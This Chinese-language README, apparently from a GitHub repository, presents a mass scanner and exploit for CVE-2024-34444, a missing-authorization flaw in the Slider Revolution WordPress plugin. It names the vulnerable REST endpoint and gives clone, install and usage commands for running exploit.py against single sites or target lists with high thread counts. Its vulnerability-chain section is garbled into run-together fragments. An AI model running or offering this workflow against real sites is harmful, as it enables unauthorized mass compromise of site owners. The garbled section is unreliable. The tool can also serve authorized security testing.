针对影响 Slider Revolution WordPress 插件(版本 < 6.7.0)的 CVE-2024-34444 的专业批量扫描器
Banner
CVE-2024-34444 是 Slider Revolution WordPress 插件(版本 < 6.7.0)中的一个缺失授权漏洞。该扫描器通过 REST API 端点 /wp-json/revslider/v1/slider/save 自动检测并利用易受攻击的安装。
漏洞链条:
revslider_actions noncecheck_nonce()readme.txt 自动版本检测-v)用于详细日志-o)保存结果git clone https://github.com/dzmind2312/CVE-2024-34444.git
cd CVE-2024-34444
pip3 install -r requirements.txt
# 单一目标
python3 exploit.py -u https://target.com
# 单一目标(详细模式)
python3 exploit.py -u https://target.com -v
# 批量扫描(从列表)
python3 exploit.py -l targets.txt -t 20
# 批量扫描(带输出文件)
python3 exploit.py -l sites.txt -t 50 -o vulnerable.txt
# 完整示例(所有选项)
python3 exploit.py -l targets.txt -t 100 -o results.txt -v